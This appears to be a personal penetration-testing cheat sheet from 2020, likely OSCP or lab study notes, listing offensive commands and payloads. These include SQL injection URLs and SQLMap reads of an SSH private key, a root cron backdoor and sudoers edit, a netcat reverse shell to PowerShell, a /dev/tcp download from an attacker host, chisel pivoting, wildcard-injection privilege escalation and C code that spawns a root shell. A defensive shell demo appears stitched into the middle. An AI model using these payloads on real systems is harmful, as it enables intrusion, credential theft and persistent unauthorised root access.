Feb 21, 2020, 05:54 PM
* FUZZING REST API FOR SQLi
- GET /users/admin'%20or%201='1
- GET /users/admin'%20or%201='1'%20limit%201,1--%20-
- GET /users/admin'%20or%201='1'%20limit%200,1--%20-

* SQLMap automatic injection point
- '*'
- /users/*

* SQLMap file read
- --file-read /home/dorthi/.ssh/id_rsa

* MySQL SQLi - load file contents
- GET /users/inexistent'%20union%20select%20all%20LOAD_FILE(0x<file path in hex>)--%20-
- python3
- import binascii
- binascii.hexlify(b"<file path>")

* AWK - print 4th field from CSV (',' separator)
- awk -F, '{print $4}'

* Server-side injection payloads
- Payload all the things

* netcat check port status
- nc -zv <ip> <port>

* decrypt RSA private key (strip passphrase)
- openssl rsa -in <filename> -out <output filename>

* SSH command mode
- ~C at the start of a fresh line (right after Enter) opens the ssh command prompt
- -L9000:<remote ip>:9000

* Port knocking with bash
- for i in <port1> <port2> <port3>; do nc -zu <ip> $i; done

* root filesystem access (container mapping) -> interactive shell
- edit /var/spool/cron/crontabs/root
- add entry: * * * * * /tmp/backdoor.sh
- edit /etc/sudoers
- add entry: <username> ALL=(ALL) NOPASSWD: /bin/sh
- sudo /bin/sh

* wfuzz hide results with 0 lines
- wfuzz -u <url> -w <wordlist> --hl 0

* wfuzz hide results with specific text
- wfuzz -u <url> -w <wordlist> --hs "<text>"

* test smb credentials
- smbmap -u <username> -p <password> -H <host>
- smbclient -U '<username>%<password>' \\\\<host>\\<sharename>

* faster but less reliable full scan
- nmap -v --max-retries=0 -T5 -p- <ip>

* 64-bit netcat for Windows
- https://eternallybored.org/misc/netcat/
- nc64.exe <ip> <port> -e powershell

* check windows user privileges
- whoami /all
- if SeImpersonate or SeAssignPrimaryToken:
- https://github.com/ohpe/juicy-potato

* bash on Windows filesystem location
- c:\users\<username>\appdata\local\packages\CanonicalGroupLimited.*\LocalState\rootfs\

* Pivoting without SSH
- https://github.com/jpillora/chisel

* OSCP resources
- https://0xdf.gitlab.io/tags.html#oscp

* JavaScript Beautifier
- https://beautifier.io/

* reverse image search
- google.com/images
- search by image

* JSON command line processor
- https://stedolan.github.io/jq/

* File transfer without netcat
- bash -c "cat < /dev/tcp/<attacker ip>/<attacker port> > /dev/shm/LinEnum.sh"

* JWT cracking with john
- https://github.com/Sjord/jwtcrack/blob/master/jwt2john.py

* Server-side template injection tool
- https://github.com/epinna/tplmap
- also burp extension

* curl alternative
- httpie

* Useful payloads
- https://github.com/swisskyrepo/PayloadsAllTheThings

* Server-side template injection strategy
- https://portswigger.net/blog/server-side-template-injection

* Statically-linked Linux/Darwin/Windows binaries
- https://github.com/andrew-d/static-binaries

* chisel forward local 8001 to remote 80
- [kali] chisel server -p 8000 -reverse -v
- [target] chisel client <kali ip>:8000 R:<kali listening ip>:8001:<target ip>:80
- [kali] curl http://localhost:8001 -> returns http://<target ip>/
- e.g. access hidden service, possibly on another network, from local host

* Port scan without nmap or nc
- for port in $(seq 1 65535); do
    (echo scan > /dev/tcp/<ip>/$port && echo "open - $port") 2>/dev/null
  done

* chisel forward remote port to local port (remote 9001 to kali 8001)
- [kali] chisel server -p 8000 -reverse -v
- [target] chisel client <kali ip>:8000 9001:127.0.0.1:8001
- [kali] nc -nlvp 8001
- e.g. proxy remote reverse shell, possibly on another network through remote host to local
- anything sent to remote host 9001/tcp gets forwarded to local 8001/tcp

* Escape restricted environments
- https://gtfobins.github.io/
- https://lolbas-project.github.io/

* Privesc via shell filename expansion
- touch -- '<filename>'
- touch -- '-e sh <shell script file>.rdb'
- touch -- '-e "sh <shell script file>.rdb"'
- vulnerable binary: rsync <args> *.rdb becomes rsync <args> -e sh <shell script file>.rdb
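As an added illustration (not part of the original notes) of the expansion trick above and its fix, this POSIX sh script creates constructed file names in a temporary directory, shows what `*.rdb` expands to, and shows the `./*.rdb` spelling that keeps a glob from ever producing an option-looking word; the `count_dash_names` audit helper is likewise an assumption for this demo, not a real tool.

```shell
#!/bin/sh
# Added demo (not from the original notes): a file name that starts with "-"
# becomes an option after glob expansion; prefixing the glob with ./ prevents it.
LC_ALL=C; export LC_ALL             # deterministic sort order for the glob
demo_dir=$(mktemp -d)
cd "$demo_dir" || exit 1
# Constructed file names: one ordinary data file, one shaped like an rsync option
touch -- 'normal.rdb' '-e sh payload.rdb'

# Unsafe: *.rdb expands with "-e sh payload.rdb" first, which a command parses as -e
unsafe_first_arg() { set -- *.rdb; printf '%s' "$1"; }

# Safe: ./*.rdb can never yield a word beginning with "-"
safe_first_arg() { set -- ./*.rdb; printf '%s' "$1"; }

# Audit helper: count entries in the current directory whose name starts with "-"
count_dash_names() {
    n=0
    for f in ./*; do
        case "${f#./}" in -*) n=$((n + 1)) ;; esac
    done
    printf '%s' "$n"
}
```

The `./` prefix works for any command that is handed a glob, and the audit loop is a cheap way to spot such file names in directories a privileged cron job or script globs over.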
* chisel as SOCKS proxy
- [kali] chisel server -p 8000 -reverse
- [target] chisel client <kali ip>:8000 R:8001:127.0.0.1:1337
- [target] chisel server -p 1337 --socks5
- [kali] chisel client 127.0.0.1:8001 socks
- [kali] run socks client with proxy configured as 1080/tcp on <kali ip>
- proxychains nmap -sT ...

* list wfuzz payloads
- wfuzz -z help
- wfuzz -z range,1-65535 ...

* devops cheat sheets
- https://lzone.de/

* list libraries linked to binary
- ldd <binary path>

* compile shared library
- gcc -shared -fPIC -o <output filename> <input filename>
- ldconfig
- simple privesc shell:
#include <stdio.h>
#include <unistd.h>
extern int seclogin();
int seclogin(){
    setreuid(0,0);                        /* become root if the caller is setuid */
    char *argv[] = {"/bin/bash", NULL};   /* argv must not be NULL */
    execve("/bin/bash", argv, NULL);
    return 0;
}